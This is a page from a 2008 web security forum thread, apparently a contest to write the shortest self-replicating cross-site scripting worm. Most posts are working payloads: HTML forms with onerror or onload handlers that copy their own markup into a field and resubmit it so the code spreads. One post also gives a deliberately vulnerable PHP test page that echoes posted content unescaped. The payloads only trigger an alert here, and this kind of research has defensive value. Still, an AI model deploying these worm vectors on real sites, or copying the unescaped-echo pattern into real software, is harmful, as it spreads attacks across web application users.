Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 16 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:53PM

ronald as u say.. that grows, right?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 02:54PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 02:54PM

nope the semi colon is required to prevent growth

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:57PM

yeah it does? ah okay, new one for me. hehe... c'mon guys, we're right back where we started! a staggering bloated 140+

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 02:57PM

@ma1 - correct, if you define it, you are okay, if you try to find it by it's location on a page in reference to something else that may or may not be there, that's not okay. Sorry if that was unclear to anyone.

The "spirit" of the rule (and most of the rules, actually) is that I want it to be pretty generic and work most of the time.

So that said, most of the plusses that are being used in the vectors are getting stripped by echo urldecode($_REQUEST[content]); which would make most of them invalid as written on the second iteration.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:58PM

well, this is just me?
content=%3Cform%3E%3Cinput+name%3D%22content%22%3E%3Ciframe+onload%3D%22%28f%3DparentNode%29%5B0%5D.value%3D%27%3Cform%3E%27%2Bf.innerHTML%3Bf.submit%28alert%28%27XSS%27%2Cf.action%3D%28f.method%3D%27post%27%29%2B%27.php%27%29%29%22%3E%3B%3C%2Fiframe%3E

the semicolon is not helping..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 02:58PM

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

149 bytes (shame on me...)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/09/2008 03:00PM by ma1.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:01PM

rsnake:

well, that's not fair xD

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML.replace(/\+/g,'%2B'),submit(alert('XSS'))">

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+encodeURIComponent(innerHTML),submit(alert('XSS'))">


still.. not fair..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:01PM

ma1: sorry I won you on that one :P
http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19390

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 03:02PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:02PM

rsnake Wrote:
-------------------------------------------------------
> So that said, most of the plusses that are being
> used in the vectors are getting stripped by echo
> urldecode($_REQUEST); which would make most of
> them invalid as written on the second iteration.

urldecode($_REQUEST) is nonsense, every element of the $_REQUEST, $_GET and $_POST arrays are already decoded.
My observation about the "+" applied only to XHR vectors which weren't escaping them, otherwise the form transparently urlencodes everything on submit.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:03PM

@ma1 - yours doesn't grow, but it won't work (pluses are changed to spaces):

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post') '.php',i[0].value='<form>' innerHTML,submit(alert('XSS'))">

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:04PM

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/09/2008 03:05PM by ma1.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:05PM

@ma1 - test with this script to see what I mean:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
echo urldecode($_REQUEST[content]);
?>


</body>
</html>

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 03:07PM by rsnake.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:07PM

@ma1 - that one worked better, but it failed the second time it ran.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:07PM

rsnake, why r u urldecoding that? I dont understand xD

anyway..
shame on me?

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 03:09PM

Does mine grow on IE?

I haven't got it to test

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:11PM

You mean as opposed to:

echo $_POST["content"];

I guess I could do that instead. Never mind, ma1 - I was smoking crack, yours works fine. You can blame .mario for my insanity! ;)

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/09/2008 03:12PM by rsnake.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:11PM

I will get nightmares now, so you know. :)

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:11PM

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:13PM

Hahah... sorry, sorry, I was totally mis-reading and caused some turmoil here. Here's what you should be using:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
echo $_POST[content];
?>


</body>
</html>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:15PM

This rox btw:

onerror="_=parentNode.cloneNode(true);alert(_)"

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:17PM

we dont want urldecode!!

[[url=http://www.netdisaster.com/go.php?mode=tomato&destruction=massive&lang=es&url=http%3A//sla.ckers.org/forum/read.php%3F2%2C18790]http://sla.ckers.org/defaced[/url]]

hehe just a joke.. it doesnt work on firefox+noscript in some cases so.. try it on IE

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:19PM

hey, so mine is the smallest?
http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19390
i rock!! hehe

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:20PM

Yeah you have the SMALLEST, wear it with pride i'dd say! ;-)

when is this over btw? i'm desparetly trying to get my life back.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:22PM

ahh come on ronald.. you know that everyone helped to get this smaller..
at the end I guess rsnake will have to say that we all won..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:23PM

ah btw.. the quotes are wrong..

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

hehe

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 03:24PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:25PM

hehe, I know just messing around. I'm a bit shamed of the flawed vectors I posted, you see it spawned about 100+ messages with error prone children, but that's what you get with mutating atrocities!

I had my fun, I don't know which one is best, I like ma1's iframe sliced xhr since it's more unobtrusive, and harder to detect whats happening.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 03:25PM

@ronald

This ROX :D

<form action="post.php"><img src="" onerror="with(parentNode)appendChild(cloneNode(1));alert(parentNode.innerHTML.slice(103))"></form>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:27PM

are u sure that doesnt grow?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">

HELLO WORLD
<form action="post.php"><img src="" onerror="with(parentNode)appendChild(cloneNode(1));alert(parentNode.innerHTML.slice(103))"></form>
HELLO WORLD

</body>
</html>

and where's the submit and the payload :S

I dont undersant dude..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 03:28PM by sirdarckcat.

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 03:30PM

@sdc

It wasn't an entry, I was demoing cloning a parent node with itself and it's contents.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:30PM

ahh ok Sorry

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Pages: PreviousFirst...1011121314151617181920Next
Current Page: 16 of 20


Sorry, only registered users may post in this forum.